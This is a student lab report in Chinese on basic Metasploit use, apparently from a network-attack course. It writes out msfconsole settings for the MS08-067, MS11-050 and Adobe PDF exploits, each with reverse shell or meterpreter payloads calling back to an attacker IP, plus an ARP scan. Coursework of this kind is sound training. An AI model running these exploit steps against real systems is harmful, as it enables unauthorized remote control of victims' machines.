1. 程式人生 > >2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用

2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用

code 敏感信息 解決 xpl num nco 體會 windows 安全

2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用


  • 驗前準備

  • 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

  • 一個主動攻擊實踐,如ms08-067; (1分)

  • 一個針對瀏覽器的攻擊,如ms11-050;(1分)

  • 一個針對客戶端的攻擊,如Adobe;(1分)

  • 成功應用任何一個輔助模塊。(0.5分)

  • 預備知識

    一、MSF的六種模塊
Exploit模塊
是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而獲得對遠程目標系統訪問權的代碼組件。
形象點來說就是攻擊模塊

Payload模塊
是在滲透成功後促使目標系統運行的一端植入代碼,通常作用是為滲透攻擊者打開在目標系統上的控制會話連接。實際上,該模塊就是計算機集成的針對不同操作系統實現shellcode攻擊的ruby代碼。

Encoder模塊
針對payload進行編碼,可以通過多種編碼手段、多次編碼方式有效的改變payload代碼特征
不改變payload作用,但能對payload進行加工

Aux模塊
能夠幫助滲透測試中在進行滲透攻擊之前得到的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。
主要包括針對各種網絡服務的掃描和查點、構建虛假服務收集登錄密碼、口令猜測破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。

Post模塊
支持在滲透攻擊取得目標系統遠程控制權之後,在受控系統中進行給各樣的後滲透攻擊動作。
這裏主要指的是攻擊之後可能用到的模塊

Nops模塊
是一些對程序運行狀態不會造成任何實質影響的空操作或無關操作指令,最典型的空指令就是空操作,在X86 CPU體系架構平臺上的操作碼是0x90
因為有些代碼返回地址很難確認,所以在實際中有時候會填充一大段空指令,便於快速確定返回地址的位置

二、MSF常用漏洞利用命令

search name:用指定關鍵字搜索可以利用的漏洞模塊
use exploit name:使用漏洞
show options:顯示配置選項
set option name option:設置選項
show payloads:回鏈攻擊載荷
show targets 顯示目標(os版本)
set TARGET target number:設置目標版本
exploit:開始漏洞攻擊
sessions -l:列出會話
sessions -i id:選擇會話
sessions -k id:結束會話
Ctrl+z:把會話放到後臺
Ctrl+c:結束會話
show auxiliary:顯示輔助模塊
use auxiliary name :使用輔助模塊
set option name option:設置選項
exploit:運行模塊

實驗內容

  • Windows服務滲透攻擊——MS08-067安全漏洞

  • 攻擊機:kali;靶機:windows 2003

  • 在攻擊機kali輸入msfconsole進入控制臺,並進入

use exploit/windows/smb/ms08_067_netapi界面,配置好端口號和回連ip:

set payload generic/shell_reverse_tcp //tcp反向回連
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口
set RHOST 192.168.6.131 //靶機ip,特定漏洞端口已經固定
set target 0 //自動選擇目標系統類型,匹配度較高
exploit //攻擊
  • 技術分享圖片

  • 建立會話,攻擊成功結果如下:

  • 技術分享圖片

  • 瀏覽器滲透攻擊——MS11-050

  • 攻擊機:kali;靶機:WindowsXP Professional sp2/Windows7專業版

  • 在kali的mfconsole下進入use windows/browser/ms11_050_mshtml_cobjectelement,並配置好回連ip和端口號,開始監聽:


set payload windows/meterpreter/reverse_http //http反向回連
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口固定
set URIPATH 5225wgy //統一資源標識符路徑設置
exploit
  • 技術分享圖片

  • 在xp的瀏覽器輸入http://192.168.43.116:8080/5225wgy,IE出現彈窗,警告遇到問題需關閉程序:

  • 技術分享圖片

  • 將其列為可信網站之後,再次進入,則出現以下界面,攻擊失敗:

  • 技術分享圖片

  • 針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

  • 攻擊機:kali;靶機:windowsXP Professional sp2 ③Adobe版本:9.3

  • 在kali的msfconsole進入use windows/fileformat/adobe_cooltype_sing,並配置好信息,生成攻擊pdf:

set payload windows/meterpreter/reverse_tcp //tcp反向回連
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口
set FILENAME 5225wgy.pdf //設置生成pdf文件的名字
exploit //攻擊
  • 技術分享圖片

  • 但是由於kali隱藏了部分文件夾,我們需要手動設置顯示隱藏文件夾才能找到這個pdf文件(我一開始是使用mv指令移到桌面的..)

  • 技術分享圖片

  • 將生成的pdf文件拷貝到靶機上,在kali上輸入back退出當前模塊,進入監聽模塊,進入use exploit/multi/handler並配置好信息:

set payload windows/meterpreter/reverse_tcp //tcp反向連接
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口固定
exploit
  • 技術分享圖片

  • 在靶機上打開5225.pdf文件:

  • 技術分享圖片

  • 攻擊機顯示攻擊成功:

  • 技術分享圖片

  • 此時若關閉pdf文件,則無法攻擊:

  • 技術分享圖片

  • 輔助模塊的應用:arp_sweep

  • 攻擊機:kali;靶機:windows 2008

  • 使用show auxiliary查看可以運用的輔助模塊:

  • 技術分享圖片

  • 使用use auxiliary/scanner/discovery/arp_sweep進入模塊,並使用show options查看需填參數:

  • 技術分享圖片

  • 創建一個msf所需的數據庫

  • 技術分享圖片

  • exploit掃描目標機:

  • 技術分享圖片

  • 可見目標機正在運行的ip信息

  • 回答問題

  • 用自己的話解釋什麽是exploit,payload,encode

  • exploit: 就是利用發現的漏洞和配置好的信息攻擊靶機的指令

  • payload:攻擊載荷,在它傳到靶機中後執行相應的代碼

  • encode:編碼器

  • 實驗中遇到的問題及解決方法

  • 問題:Windows服務滲透攻擊——MS08-067安全漏洞時,攻擊xp proferssional失敗

  • 技術分享圖片

  • 解決方案:攻擊機換成win2003即可(或者更低版本)

  • 實踐總結與體會

  • 這次實驗並不困難,但是模塊太多,第一次接觸有點眼花繚亂,我們發現msf的使用還是有套路可循的:進入模塊->指定荷載->設置參數->發動攻擊

  • 離實戰還缺些什麽技術或步驟?

  • 還差的很遠,嘗試過的模塊只是九牛一毛,如果要實戰還需要很多時間去研究其他模塊。

2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用